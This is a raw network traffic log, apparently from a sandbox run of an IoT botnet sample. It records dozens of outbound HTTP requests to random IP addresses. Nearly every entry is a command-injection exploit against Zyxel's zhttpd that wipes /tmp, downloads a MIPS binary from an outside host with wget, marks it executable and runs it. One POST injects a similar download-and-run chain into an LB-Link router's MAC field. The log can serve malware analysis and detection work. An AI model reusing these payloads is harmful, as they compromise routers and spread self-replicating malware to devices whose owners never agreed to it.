                                        Mar 31, 2024 09:22:49.944112062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9586192.168.2.2343580139.118.169.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944125891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9587192.168.2.2334832191.80.98.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944186926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9588192.168.2.235534836.122.248.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944238901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9589192.168.2.2358392126.142.215.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944308996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9590192.168.2.233959871.76.83.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944389105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9591192.168.2.2335116130.222.155.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944411993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9592192.168.2.2360242136.23.88.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944474936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9593192.168.2.2348886221.109.167.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944514036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9594192.168.2.235074892.177.81.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944555998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9595192.168.2.236082673.224.200.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944581032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9596192.168.2.2345472158.84.191.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944636106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9597192.168.2.23434349.108.177.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944686890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9598192.168.2.2345698192.231.169.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944717884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9599192.168.2.234101275.101.170.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944776058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9600192.168.2.2349242139.236.71.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944807053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9601192.168.2.234150451.220.218.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944866896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9602192.168.2.235142812.182.145.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.951467991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9603192.168.2.234899249.66.184.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952156067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9604192.168.2.2344538175.15.184.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952157021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9605192.168.2.235872486.255.89.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952192068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9606192.168.2.234112270.216.40.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952256918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9607192.168.2.234231284.144.123.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952294111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9608192.168.2.235558862.214.192.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952357054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9609192.168.2.233878691.182.169.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952461958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9610192.168.2.235754440.196.196.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952477932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9611192.168.2.2355284203.64.212.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952519894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9612192.168.2.23402301.76.83.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.952575922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9613192.168.2.2355448125.3.225.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951060057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9614192.168.2.2351946170.154.44.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951097012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9615192.168.2.2352684133.49.134.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951157093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9616192.168.2.235543431.194.67.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951201916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9617192.168.2.2344130172.142.7.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951280117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9618192.168.2.234371091.224.0.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951338053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9619192.168.2.2346604149.13.242.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951401949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9620192.168.2.235207038.44.123.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951431990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9621192.168.2.234881675.69.84.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951504946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9622192.168.2.2355312170.61.37.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951538086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9623192.168.2.235626282.4.130.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951581001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9624192.168.2.235454897.185.43.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951611042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9625192.168.2.2351888157.39.48.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951636076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9626192.168.2.2335782189.41.246.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951704025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9627192.168.2.2337296216.18.214.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.951756954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9628192.168.2.235868431.1.138.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.952227116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9629192.168.2.2347368196.60.249.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:50.952281952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9630192.168.2.2359102193.79.151.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:51.956082106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9631192.168.2.2350284193.7.227.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:51.956140041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9632192.168.2.234855077.53.85.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:51.956188917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9633192.168.2.2337374200.232.184.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:51.956358910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9634192.168.2.2359502210.191.128.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:51.956418037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9635192.168.2.233748899.41.232.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:52.962050915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9636192.168.2.2345834132.73.108.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:52.962234974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9637192.168.2.2353624104.16.38.958080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.895881891 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:53.990639925 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:53 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9638192.168.2.2352286118.246.46.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965533018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9639192.168.2.2350760168.242.146.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965575933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9640192.168.2.2350390130.202.21.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965624094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9641192.168.2.2334834170.220.181.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965646982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9642192.168.2.235302647.189.188.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965703964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9643192.168.2.2333950185.239.229.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965744972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9644192.168.2.234781254.252.65.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965814114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9645192.168.2.2348598121.76.226.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.965850115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9646192.168.2.2338086159.193.56.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.966162920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9647192.168.2.235963084.140.25.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:53.966195107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9648192.168.2.234455281.98.75.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969382048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9649192.168.2.233313649.72.132.90443
                                        TimestampBytes transferredDirectionData
